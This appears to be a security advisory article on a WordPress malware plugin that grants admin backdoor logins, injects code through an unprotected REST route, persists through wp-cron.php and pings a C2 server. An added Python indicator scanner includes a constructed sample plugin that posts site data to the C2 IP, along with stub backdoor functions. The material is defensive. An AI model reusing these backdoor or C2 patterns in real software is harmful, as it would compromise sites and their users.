
The Wordfence Threat Intelligence team has issued a critical warning about a sophisticated malware variant that is disguising itself as a legitimate WordPress plugin. Discovered during a site clean on January 22, 2025, this malware appears as a benign file — often named WP-antymalwary-bot.php — yet grants attackers extensive control over compromised WordPress sites.
According to Wordfence, “this malware variant appears in the file system as a normal WordPress plugin, often with the name ‘WP-antymalwary-bot.php’, and contains several functions that allow attackers to maintain access to your site, hide the plugin from the dashboard, and execute remote code.”
At first glance, the malicious plugin seems legitimate, complete with header comments, code indentation, and professional structure. However, under the surface, it offers attackers a wide arsenal of capabilities, including:
- Administrator Access: Using a backdoor function (emergency_login_all_admins), attackers can immediately log in as the first administrator user by sending a crafted GET request.
- Remote Code Execution: A REST API route is registered without any permission checks (in WordPress terms, with no permission_callback restricting who may call it), allowing unauthenticated attackers to inject PHP code into theme files like header.php.
- Persistence Mechanism: Even if the plugin is deleted, a modified wp-cron.php file reinstalls and reactivates it during the next site visit.
As Wordfence explains, “Should the plugin be removed from the plugins directory, the wp-cron.php file will replace it upon the next site visit to the site allowing a threat actor to maintain persistence on a compromised site, if not thoroughly remediated.”
The malware further enhances stealth by:
- Hiding from WordPress Admin Dashboard: The hide_plugin_from_list function ensures the plugin remains invisible to site administrators.
- Communicating with a Command & Control (C2) Server: Infected sites send a “ping” once a minute to a server located in Cyprus (IP: 45.61.136.85) to inform the attacker that the implant is still running.
- Injecting Malicious JavaScript Ads: Via obfuscated methods, malicious ads are loaded dynamically into the <head> section of the site’s pages using scripts retrieved from compromised external resources.
Wordfence notes, “The file ads.php simply contains a base64 encoded URL to a JavaScript file on yet another hacked site for added obfuscation.”
Newer versions of this malware have evolved rapidly, integrating additional mechanisms like:
- Scheduled WordPress events to automate malicious communication.
- Enhanced methods to update ad-serving URLs dynamically.
- Encrypted payloads injected into header.php, requiring decryption keys supplied through URL parameters — making detection even harder.
Wordfence observed that, “The information sent to the C&C server includes the site URL as well as a timestamp, which is sent every minute.”
Site administrators should urgently look for:
- Outbound requests from the web server to http://45.61.136.85:5555/api/plugin-ping (these are made by the infected site itself, so they appear in egress or firewall logs rather than in the web server’s access log)
- Presence of emergency_login GET parameters in access logs
- Modifications to wp-cron.php
- Unexpected “patterns” directories within theme folders
- Alterations to theme header.php files
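As an added example (not Wordfence’s code and not the malware’s source), the following Python script turns the indicators listed above into an offline scan over constructed sample data: an access-log excerpt, one plugin file and a wp-cron.php. The IP address, ping path, emergency_login parameter, function names and disguise file names come from the article; the sample log lines, the example.invalid URL, the inject_code callback name, and the two heuristics (a REST route registered without a permission_callback, and a wp-cron.php that writes into the plugins directory) are assumptions made for this example.

```python
"""IoC scan for the WP-antymalwary-bot family (added example, constructed samples)."""
import base64
import binascii
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the article.
C2_IP = "45.61.136.85"
C2_PING_PATH = "/api/plugin-ping"
KNOWN_FILENAMES = {"WP-antymalwary-bot.php", "addons.php", "wpconsole.php",
                   "wp-performance-booster.php", "scr.php"}
SUSPICIOUS_FUNCTIONS = ("emergency_login_all_admins", "hide_plugin_from_list")
BACKDOOR_PARAM = "emergency_login"

# Request line inside a combined-format (Apache/nginx) access-log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Long runs of the base64 alphabet, candidates for a hidden URL.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def find_backdoor_logins(access_log: str) -> List[str]:
    """Return log lines whose query string carries the emergency_login parameter."""
    hits = []
    for line in access_log.splitlines():
        m = REQUEST_RE.search(line)
        if m and BACKDOOR_PARAM in parse_qs(urlsplit(m.group(1)).query,
                                            keep_blank_values=True):
            hits.append(line)
    return hits


def decode_base64_urls(source: str) -> List[str]:
    """Decode base64 blobs and keep those that are URLs (the ads.php trick)."""
    urls = []
    for blob in B64_RE.findall(source):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        if decoded.startswith((b"http://", b"https://")):
            urls.append(decoded.decode("ascii", errors="replace"))
    return urls


def scan_plugin_file(name: str, source: str) -> List[str]:
    """Findings for one file under wp-content/plugins."""
    findings = []
    if name in KNOWN_FILENAMES:
        findings.append(f"filename matches known disguise: {name}")
    for fn in SUSPICIOUS_FUNCTIONS:
        if re.search(rf"\bfunction\s+{fn}\s*\(", source):
            findings.append(f"defines {fn}()")
    if C2_IP in source or C2_PING_PATH in source:
        findings.append("references the C2 server")
    # Heuristic (assumption, not from the article): a REST route with no
    # permission_callback is the "no permission checks" pattern described above.
    if "register_rest_route" in source and "permission_callback" not in source:
        findings.append("registers a REST route without permission_callback")
    findings += [f"base64-hidden URL: {u}" for u in decode_base64_urls(source)]
    return findings


def wp_cron_tampered(source: str) -> bool:
    """Heuristic (assumption): stock wp-cron.php never writes into the plugins
    directory or activates plugins; the persistence variant does."""
    return bool(re.search(r"wp-content/plugins|activate_plugin\(|file_put_contents\(", source))


def scan_site(plugins: Dict[str, str], wp_cron: str, access_log: str) -> Dict[str, object]:
    """Aggregate all checks into one report."""
    return {
        "backdoor_logins": find_backdoor_logins(access_log),
        "plugin_findings": {n: f for n, s in plugins.items() if (f := scan_plugin_file(n, s))},
        "wp_cron_tampered": wp_cron_tampered(wp_cron),
    }


# Constructed samples: not real traffic and not real malware source.
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [22/Jan/2025:10:01:02 +0000] "GET /?emergency_login=1 HTTP/1.1" 302 0 "-" "curl/8.4"
198.51.100.5 - - [22/Jan/2025:10:01:05 +0000] "GET /?p=42 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.10 - - [22/Jan/2025:10:02:30 +0000] "POST /wp-json/ HTTP/1.1" 200 12 "-" "curl/8.4"
"""
SAMPLE_PLUGIN = (
    "<?php\n/*\nPlugin Name: WP Performance Booster\n*/\n"
    "function emergency_login_all_admins() { /* ... */ }\n"
    "function hide_plugin_from_list($plugins) { return $plugins; }\n"
    "add_action('rest_api_init', function () {\n"
    "    register_rest_route('wp/v2', '/inject', ['callback' => 'inject_code']);\n"  # hypothetical name
    "});\n"
    "$ads = base64_decode('" + base64.b64encode(b"https://example.invalid/ads.js").decode() + "');\n"
    "wp_remote_post('http://" + C2_IP + ":5555" + C2_PING_PATH + "', ['body' => site_url()]);\n"
)
SAMPLE_WP_CRON = ("<?php\nrequire_once __DIR__ . '/wp-load.php';\n"
                  "file_put_contents(WP_PLUGIN_DIR . '/WP-antymalwary-bot.php', $payload);\n")

if __name__ == "__main__":
    report = scan_site({"wp-performance-booster.php": SAMPLE_PLUGIN,
                        "hello.php": "<?php // benign"}, SAMPLE_WP_CRON, SAMPLE_ACCESS_LOG)
    for key, value in report.items():
        print(key, value)
```

On a live site the same functions would be fed real file contents from wp-content/plugins and wp-cron.php plus the web server access log; the base64 decoder is deliberately generic so it also surfaces ad-loader URLs that point at sites other than the ones named here.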
The malware has been seen under various disguises, including:
- WP-antymalwary-bot.php
- addons.php
- wpconsole.php
- wp-performance-booster.php
- scr.php